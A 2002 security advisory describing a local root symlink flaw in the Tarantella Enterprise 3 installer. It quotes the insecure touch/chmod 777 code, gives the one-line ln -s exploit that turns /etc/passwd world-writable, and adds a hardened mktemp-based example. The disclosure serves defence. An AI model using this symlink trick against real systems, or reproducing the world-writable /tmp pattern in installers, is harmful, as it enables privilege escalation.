======Local Root During Install of Tarantella 3======

//2/18/2002//

Another local root vulnerability during installation of Tarantella Enterprise 3.

During installation a "twirling / \ | - " text graphic is displayed (you remember them from the shareware games in DOS days...). To track what stage the installation is at, the installer creates a file in /tmp called spinning. The file's permissions are changed to read, write and execute for all, and the file is removed and recreated during different stages of the installation. It is vulnerable to a simple symlink attack.

Problem Code:
<----snip---->
touch /tmp/spinning >/dev/null 2>&1
chmod 777 /tmp/spinning >/dev/null 2>&1
<----snip---->

Exploit
There is no race condition here; just create the link.

[lwc@misery] ln -s /etc/passwd /tmp/spinning

Wait until root is done installing...

[lwc@misery] ls -l /etc/passwd
-rwxrwxrwx 1 root root 1094 Feb 18 22:39 /etc/passwd

Recommendations
I again recommend that the target system be running in single-user mode before this software is installed.

The vendor has been notified and plans to fix this in the next release.
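For comparison with the problem code above, one way an installer script can keep its spinner state without a predictable, world-writable file in /tmp. This is an added example, not code from the advisory or the vendor's fix; the function names and the tta-install prefix are hypothetical, and it assumes mktemp(1) is available on the target system.

```shell
#!/bin/sh
# Added example (not the vendor's code). All names below are hypothetical.

# Create the spinner state file inside a fresh private directory.
# mktemp -d picks an unpredictable name, creates it with mode 0700 and fails
# rather than reusing an existing path, so a link planted in advance at a
# guessable name is never opened or chmod'ed.
make_spin_state() {
    base=${1:-${TMPDIR:-/tmp}}
    dir=$(mktemp -d "$base/tta-install.XXXXXX") || return 1
    ( umask 077 && : > "$dir/spinning" ) || return 1
    printf '%s\n' "$dir/spinning"
}

# Remove the state file and its directory when the install finishes.
cleanup_spin_state() {
    rm -f -- "$1" && rmdir -- "$(dirname -- "$1")"
}

# Permission string of a path, e.g. "-rw-------" (no stat(1) flags needed).
# Some ls builds append a marker such as "." or "+", so keep 10 characters.
mode_of() {
    ls -ld -- "$1" | cut -c1-10
}

# Constructed check: plant a link named "spinning" in a scratch directory,
# run the hardened routine there, and print the link target's mode afterwards.
check_planted_link() {
    scratch=$(mktemp -d "${TMPDIR:-/tmp}/spin-check.XXXXXX") || return 1
    ( umask 077 && : > "$scratch/victim" )
    ln -s "$scratch/victim" "$scratch/spinning"
    state=$(make_spin_state "$scratch") || return 1
    mode_of "$scratch/victim"
    cleanup_spin_state "$state"
    rm -rf -- "$scratch"
}
```

Calling check_planted_link prints the mode of the link target after the routine has run; it stays at the owner-only mode it was created with, unlike /etc/passwd in the listing above.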

http://vapid.dhs.org